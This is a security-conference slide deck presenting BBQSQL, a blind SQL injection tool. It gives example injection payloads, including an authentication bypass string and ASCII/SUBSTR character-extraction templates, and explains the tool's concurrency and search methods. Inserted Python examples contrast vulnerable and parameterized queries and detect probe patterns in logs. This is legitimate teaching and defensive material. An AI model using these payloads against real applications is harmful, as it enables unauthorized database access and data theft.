BBQSQL
Ben Toews, Scott Behrens
Neohapsis

Who are we?
• Ben Toews
  o Security Consultant / Researcher at Neohapsis
• Scott Behrens
  o Security Consultant / Researcher at Neohapsis

Why are we here?
• BBQSQL
  o New dog, old trick
    ■ Exploits Blind SQL Injection
  o New dog, new trick
    ■ Fast
    ■ Easy
    ■ Gets those hard to reach spots

SQL What?
• Structured Query Language (SQL)
  o Language for interacting with database
• SQL Injection
  o Inject syntax into an application's SQL queries

Basic SQL Injection
Normal Case:
  UNAME = "mastahyeti";
  PASS = "s3cret";
  QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";
QUERY evaluates to:
  select * from users where pass=md5('s3cret') and uname='mastahyeti'

Basic SQL Injection
SQL Injection Case:
  UNAME = "pwned' or '1'='1";
  PASS = "pwned";
  QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";
QUERY evaluates to:
  select * from users where pass=md5('pwned') and uname='pwned' or '1'='1'

Blind SQL Injection
• Still trying to alter SQL syntax
• Dumping database
• More complex SQL syntax

Blind SQL Injection
Blind SQL Injection Case:
  UNAME = "' or (ASCII(SUBSTR(SELECT user(),1,1))>63) -- ";
  PASS = "";
  QUERY = "select * from users where pass=md5('" + PASS + "') and uname='" + UNAME + "'";
QUERY evaluates to:
  select * from users where pass=md5('') and uname='' or (ASCII(SUBSTR(SELECT user(),1,1))>63) -- '

Blind SQL Injection
  select * from users where pass=md5('') and uname='' or (
      ASCII(                  << char -> int
          SUBSTR(             << slice string
              SELECT user()   << current user
              ,1,1)           << first char
      ) > 63                  << 63 = '?'
  ) -- '                      << comment

Blind SQL Injection
• Binary (or other) search for each character
• One character at a time
• Time consuming

Blind SQL Injection
• Lots of excellent tools out there
  o sqlmap, sqlninja, BSQL Hacker, the Mole, Havij, ...
• Lots of great features (good job guys...)
• If these tools don't work
  o You end up writing a custom script, test, debug, test, debug...
• What if there was a way to simplify tricky Blind SQL Injection attacks...
Images from http://www.freedigitalphotos.net/

BBQSQL
• Exploits Blind SQL Injection
• For those hard to reach spots
• Semi-automatic
• Database agnostic
• Versatile
• Fast
• Fast
• Did we mention it is fast?

BBQSQL: Use
• Must provide the usual information
  o URL
  o HTTP Method
  o Headers
  o Cookies
  o Encoding methods
  o Redirect behavior
  o Files
  o HTTP Auth
  o Proxies
  o ...

BBQSQL: Use
• Provide two additional pieces of info
  o Specify where the injection goes
  o Specify what syntax we are injecting

BBQSQL: Use
• The injection can go ANYWHERE:
  o url => "http://google.com?vuln='${query}"
  o data => "user=foo&pass=${query}"
  o cookies => {'PHPSESSID':'123123','FOO':'BAR${query}'}
• Doesn't understand data
• Doesn't care about your annoying:
  ■ serialization format
  ■ processes and rules
  ■ encodings

BBQSQL: Use
• The query specifies how to do binary search:
  o query => "' and ASCII(SUBSTR((SELECT data FROM data LIMIT 1 OFFSET ${row_index:1}),${char_index:1},1))${comparator:>}${char_val:} #"
• Database agnostic
• Doesn't care about your annoying:
  o SQL syntax
  o Charset limitations
  o IDS/IPS

Demo?
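The two "Basic SQL Injection" slides build QUERY by string concatenation, which is exactly what lets the input pwned' or '1'='1 rewrite the WHERE clause. As an added example (not from the talk or from BBQSQL), here is that query in Python against an in-memory sqlite3 table, in its concatenated form and in a parameterized form that binds UNAME and the password hash as values; sqlite3 has no md5(), so the hash is computed with hashlib, and the users table is constructed for the example.

```python
import hashlib
import sqlite3

def md5hex(s):
    # Stands in for the slides' SQL md5(); sqlite3 has no md5() function.
    return hashlib.md5(s.encode()).hexdigest()

def make_db():
    # Constructed users table for the example, holding the slide's sample user.
    con = sqlite3.connect(":memory:")
    con.execute("create table users (uname text, pass text)")
    con.execute("insert into users values (?, ?)", ("mastahyeti", md5hex("s3cret")))
    return con

def login_concat(con, uname, passwd):
    """Vulnerable: the slide's QUERY, built by string concatenation.
    UNAME is pasted into the SQL text, so a quote in it ends the
    literal and the rest of the input is parsed as SQL."""
    query = ("select * from users where pass='" + md5hex(passwd) +
             "' and uname='" + uname + "'")
    return con.execute(query).fetchall()

def login_param(con, uname, passwd):
    """Hardened: same query shape, but UNAME and the hash are bound as
    parameters, so they can only ever be compared as values."""
    query = "select * from users where pass=? and uname=?"
    return con.execute(query, (md5hex(passwd), uname)).fetchall()

if __name__ == "__main__":
    con = make_db()
    print(login_concat(con, "mastahyeti", "s3cret"))       # legitimate login: 1 row
    print(login_concat(con, "pwned' or '1'='1", "pwned"))  # injected UNAME: 1 row, auth bypassed
    print(login_param(con, "pwned' or '1'='1", "pwned"))   # same input, bound as a value: []
```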
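The probe the "BBQSQL: Use" query template produces has a recognizable shape on the wire: ASCII(SUBSTR(...)) followed by a comparator and a number, repeated with a changing comparand for every character extracted. As an added defender's example (not part of the talk or the tool), this Python scans constructed web-server log lines for that shape and flags clients issuing several such probes; the log format, field layout and threshold are assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Shape of the probe the ${query} template on the "Use" slide produces:
# ASCII(SUBSTR(...)) <comparator> <number>; case and whitespace vary.
PROBE = re.compile(
    r"ascii\s*\(\s*substr(?:ing)?\s*\(.*?\)\s*\)\s*(>=|<=|<>|!=|[<>=])\s*(\d+)",
    re.IGNORECASE | re.DOTALL)

# Common-log-format line: client IP first, request line in quotes (assumed layout).
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) ')

# Constructed sample log lines (not real traffic): one client walks the
# comparand for a single character, another makes an ordinary request.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Jul/2012:14:02:11 -0700] "GET /item?vuln=%27+and+ASCII%28SUBSTR%28%28SELECT+data+FROM+data+LIMIT+1+OFFSET+1%29%2C1%2C1%29%29%3E63+%23 HTTP/1.1" 200 512
203.0.113.5 - - [28/Jul/2012:14:02:11 -0700] "GET /item?vuln=%27+and+ASCII%28SUBSTR%28%28SELECT+data+FROM+data+LIMIT+1+OFFSET+1%29%2C1%2C1%29%29%3E95+%23 HTTP/1.1" 200 512
203.0.113.5 - - [28/Jul/2012:14:02:12 -0700] "GET /item?vuln=%27+and+ASCII%28SUBSTR%28%28SELECT+data+FROM+data+LIMIT+1+OFFSET+1%29%2C1%2C1%29%29%3E111+%23 HTTP/1.1" 200 498
198.51.100.7 - - [28/Jul/2012:14:02:13 -0700] "GET /item?vuln=42 HTTP/1.1" 200 512
"""

def find_blind_probes(log_text):
    """Map client IP -> sorted distinct comparands seen in probe-shaped
    requests. The URL is decoded first because the probe travels encoded."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ip, url = m.groups()
        for _cmp, val in PROBE.findall(unquote_plus(url)):
            hits[ip].add(int(val))
    return {ip: sorted(vals) for ip, vals in hits.items()}

def flag_clients(log_text, min_probes=3):
    """Clients with at least min_probes distinct comparands: a
    character-by-character search needs several requests per character,
    so one-off noise is ignored while a running search is not."""
    return [ip for ip, vals in find_blind_probes(log_text).items()
            if len(vals) >= min_probes]
```

The same matching applies to POST bodies and cookie values once they are decoded, since the slides show the template being placed in any of those positions.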
Images from http://gossipsucker.com/

BBQSQL: Speed
• Concurrent HTTP requests
• Multiple search algorithms
  o Binary search
  o Frequency based search

BBQSQL: grequests
  grequests = gevent + requests

BBQSQL: gevent
  "gevent is a coroutine-based Python networking library that uses greenlet to provide a high-level synchronous API on top of the libevent event loop"
  - http://gevent.org

BBQSQL: gevent
• Coroutine ~ function
• You spawn many simultaneous coroutines
• Only one runs at a time
• When a coroutine encounters blocking (network IO) it yields and allows the next coroutine to run while it waits
• This forms an event-loop
• Functionally, it appears to act like threading

BBQSQL: requests
  "HTTP For Humans"
  - docs.python-requests.org
• Awesome HTTP API built on top of urllib3 in Python
• Written/maintained by Kenneth Reitz
  o API designing badass

BBQSQL: grequests
  Good Evented HTTP for Python

BBQSQL: Binary Search
  [Figure: searching the range 1..12, each comparison discards half of what remains (1..12, then 7..12, ...)]
  O(log(n))

BBQSQL: Linear Search
  [Figure: linear search]

BBQSQL: Frequency
• Analysed lots of books, source code, CCs, SSNs :P
• Most common characters are [' ', 'e', 't', 'o', 'a']
• Most likely characters to follow 'e' are [' ', 'r', 'n']

BBQSQL: Frequency
• Very fast against non-entropic data:
  o English
    ■ ~10 requests/character
  o Python
    ■ ~8 requests/character
  o Credit card numbers
    ■ ~5.5 requests/character
• VS. binary search
  o English
    ■ ~12 requests/character

BBQSQL: UI
• UI is built using source from Social Engineering Toolkit (SET)
  o Thanks Dave (ReL1K) Kennedy!
• Input validation is performed on each configuration option in real time to prevent snafu
  o You don't have to wait till you type up a huge request on the CLI and find out your 600 char POST data is malformed!

BBQSQL: UI
• Configuration files can be imported and exported through UI or CLI
  o Uses ConfigParser so easy to work with
• Can export attack results as CSV file

Credits
• Wikipedia (math is hard)
• Neohapsis Labs
• Image links are embedded in presentation
• ReL1K - SET: https://www.trustedsec.com/downloads/social-engineer-toolkit/

Thanks
Ben Toews - @mastahyeti
Scott Behrens - @helloarbit
Neohapsis(.com) << Hiring << bonus4us
BBQSQL: github.com/neohapsis/bbqsql